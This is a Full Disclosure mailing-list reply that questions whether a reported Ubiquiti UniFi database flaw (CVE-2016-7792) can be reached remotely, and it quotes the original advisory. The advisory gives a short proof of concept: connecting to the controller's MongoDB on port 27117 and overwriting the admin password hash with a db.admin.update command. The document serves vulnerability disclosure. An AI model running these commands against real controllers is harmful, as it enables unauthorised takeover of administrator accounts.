Re: Critical Vulnerability in Ubiquiti UniFi

[Carlos Silva <r3pek () r3pek org>]

Hi Tim!

I can be missing something here but I just checked this on a fresh
installed Unifi Controller and mongod is binding to localhost making this a
non-issue. Or, you have to get a remote shell first before you can get a
connection to the DB. Am I missing something?

Thanks,
Carlos Silva

On Fri, Sep 30, 2016 at 10:49 AM, Tim Schughart <
t.schughart () prosec-networks com> wrote:

> Hello @all,
>
> together with my colleague we found two uncritical vulnerabilities you'll
> find below.
>
> Product: UniFi AP AC Lite
> Vendor: Ubiquiti Networks Inc.
>
> Internal reference: ? (Bug ID)
> Vulnerability type: Incorrect access control
> Vulnerable version: Unify 5.2.7 and possible other versions affected (not
> tested)
> Vulnerable component: Database
> Report confidence: yes
> Solution status: Not fixed by Vendor, the bug is a feature.
> Fixed versions: -
> Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec
> Networks
> Solution date: -
> Public disclosure: 2016-09-30
> CVE reference: CVE-2016-7792
> CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
>
>
> Vulnerability Details:
> You are able to connect to the access points database, because of an
> broken authentication (OWASP TOP10). So you are able to modify the database
> and read the data. An possible scenario you'll find in PoC section.
>
> Risk:
> An attacker gets access to the database and for e.g. is able to change the
> admins password, like you see in PoC below.
>
> PoC:
>  1. Generate SHA512 Hash with e.g.
>  mkpasswd -m sha-512
>
>  2. Connect via network to database, e.g. :
>  mongo --port 27117 --host target_ip
>
>  3. Change password via command
>  "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
>  "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.
> nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
>  4. Login via web interface with new password
>
>
> Best regards / Mit freundlichen Grüßen
>
>
> Tim Schughart
> CEO / Geschäftsführer
>
> --
> ProSec Networks e.K.
> Ellingshohl 82
> 56077 Koblenz
>
> Website: https://www.prosec-networks.com
> E-Mail: t.schughart () prosec networks com
> Mobile: +49 (0)157 7901 5826
> Phone: +49 (0)261 450 930 90
>
> "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or
> LEGALLY PROTECTED information and is intended only for the named
> recipient(s). Any unauthorized use, dissemination, copying or forwarding is
> strictly prohibited. If you are not the intended recipient and have
> received this email communication in error, please notify the sender
> immediately, delete it and destroy all copies of this E-Mail. VAT ID:
> DE290654714 legal domicile Koblenz, HRA 21625.“
>
> "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS
> UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist
> ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte
> Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens
> verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail
> Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den
> Absender, löschen diese E-Mail und vernichten alle Kopien. USt-IdNr.:
> DE290654714, Amtsgericht Koblenz, HRA 21625."
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/